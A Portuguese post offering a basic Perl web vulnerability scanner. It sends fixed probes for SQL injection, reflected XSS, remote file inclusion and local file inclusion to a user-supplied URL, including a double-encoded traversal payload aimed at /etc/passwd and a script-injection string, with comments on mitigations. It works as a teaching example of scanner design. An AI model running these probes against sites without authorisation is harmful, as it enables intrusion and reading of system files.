Olá, esse é um VulScanner básico; ele pode ser ótimo para quem está tentando criar um e não sabe por onde começar.
Código:
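#!/usr/bin/perl
# Coded by andreol263
#
# VulScanner - a deliberately small example of how a web vulnerability
# scanner is put together.  It asks for one URL, sends one probe request per
# vulnerability class (SQL injection, reflected XSS, remote and local file
# inclusion) and looks for a tell-tale string in each response.
#
# Every check is a single-request heuristic: a hit is a lead to verify by
# hand, and a miss does not show that the parameter is safe.  The probe
# strings are fixed, so the requests are easy to recognise in web-server
# access logs and WAF rules (double-encoded "%252f" traversal, the
# "/*!oRdEr*/" comment syntax, the literal <script>alert(123);</script>).
use strict;
use warnings;

use LWP::UserAgent;

my $ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0');

# Clear the terminal with the command that exists on the current platform.
my $clear_cmd = $^O =~ /Win/ ? 'cls' : 'clear';
system($clear_cmd);

print "\tVulScanner\n\n";
print "[?]Which website will be scanned?\n";
my $site = <STDIN>;
die "[!]Wrong Input!\n" unless defined $site;    # STDIN closed / EOF
chomp $site;
$site =~ s/\A\s+|\s+\z//g;

# Add a scheme only when none was typed; an https:// URL is left alone
# (the unanchored test used before turned it into "http://https://...").
$site = "http://" . $site if $site !~ m{\Ahttps?://}i;

# Fetch $url with GET.  Returns the response body, or undef when the request
# failed or the server answered with a non-2xx status.  undef is used instead
# of an in-band "ERROR" string so a page that merely contains that word is
# not mistaken for a failed request.
sub webreq {
    my ($url) = @_;
    my $res = $ua->get($url);
    return $res->content if $res->is_success;
    return;
}

# Drop the trailing alphanumeric value of the URL (page.php?file=index ->
# page.php?file=) so that a probe replaces the value instead of extending it.
sub _strip_last_value {
    my ($url) = @_;
    $url =~ s/[a-zA-Z0-9]+\z// if $url =~ /=[a-zA-Z0-9]/;
    return $url;
}

# Local file inclusion check.  Returns the probe URL when the response
# contains a line shaped like an /etc/passwd entry (name:pw:uid:gid:),
# undef otherwise.  The earlier pattern used "\x:", which Perl reads as a
# hex escape, so it could never match a real passwd line.
# Mitigation on the server side: map the parameter to an allow-list of
# files instead of building a path from it.
sub lfi_scanning {
    my ($target) = @_;
    my $probe = _strip_last_value($target)
        . '%2500..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%2500';
    my $body = webreq($probe);
    return unless defined $body;
    return $probe if $body =~ m/^[\w.-]+:[^:\n]*:\d+:\d+:/m;
    return;
}

# Remote file inclusion check.  Returns the URL with its value stripped when
# the response contains the marker string, undef otherwise.
# NOTE(review): the marker is markup served by a third-party site and may
# change at any time - confirm it is still present before trusting a miss.
sub rfi_scanning {
    my ($target) = @_;
    my $base = _strip_last_value($target);
    my $body = webreq($base . "www.google.com.br");
    return unless defined $body;
    return $base if index($body, 'http://schema.org/WebPage') >= 0;
    return;
}

# Reflected XSS check.  Returns the probe URL when the marker comes back
# unencoded in the response, undef otherwise.  The comparison is a literal
# substring search: used as a regex, "(123)" is a capture group and would
# not match the reflected parentheses.
# Mitigation on the server side: context-aware output encoding.
sub xss_scanning {
    my ($target) = @_;
    my $marker = '"><script>alert(123);</script>';
    my $probe  = $target . $marker;
    my $body   = webreq($probe);
    return unless defined $body;
    return $probe if index($body, $marker) >= 0;
    return;
}

# SQL injection check.  Returns the probe URL when the response mentions
# "sql" or "select" (case-insensitive), undef otherwise.  This is the same
# set of pages the original alternation matched, and it is loose: any page
# that talks about SQL is flagged, so compare against the unmodified page
# before treating a hit as real.
# Mitigation on the server side: parameterized queries, and no database
# error text in responses.
sub sqli_scanning {
    my ($target) = @_;
    my $probe = $target . "+/*!oRdEr*/+/*!bY*/+1000000--";
    my $body  = webreq($probe);
    return unless defined $body;
    return $probe if $body =~ /sql|select/i;
    return;
}

print "[+]Testing Connection....\n";
# Syntactic check only: scheme, a host, no whitespace.  The earlier test
# (/www|com|tk/) rejected valid targets such as a lab host on localhost.
if ($site !~ m{\Ahttps?://[^\s/?#]+\S*\z}i) {
    die "[!]Wrong Input!\n";
}
elsif (!defined webreq($site)) {
    die "[!]ERROR within Website!\n";
}
else {
    print "[+]The site is working perfectly!\n";
}

# Every probe is appended to the URL as typed.  Without a query parameter the
# text would be glued onto the host or path, and the request could go to a
# different host than the one entered, so stop here instead.
if ($site !~ /=/) {
    die "[!]No query parameter in URL (expected something like page.php?id=1)\n";
}

print "[+]Now, testing in SQLi in site!\n";
if (defined(my $hit = sqli_scanning($site))) {
    print "[+]SQLi found in $hit\n\a";
}
else {
    print "[!]No SQLi found\n";
}

print "[+]Testing XSS in website:\n";
if (defined(my $hit = xss_scanning($site))) {
    print "[+]XSS found:$hit\n\a";
}
else {
    print "[!]No XSS!\n";
}

print "[+]Searching RFI in site:\n";
if (defined(my $hit = rfi_scanning($site))) {
    print "[+]RFI Found in:$hit\n\a";
}
else {
    print "[!]No RFI Vulnerability Found....\n";
}

print "[+]LFI Searching in site:\n";
if (defined(my $hit = lfi_scanning($site))) {
    print "[+]LFI Found in:$hit\n\a";
}
else {
    print "[!]No one LFI found!\n";
}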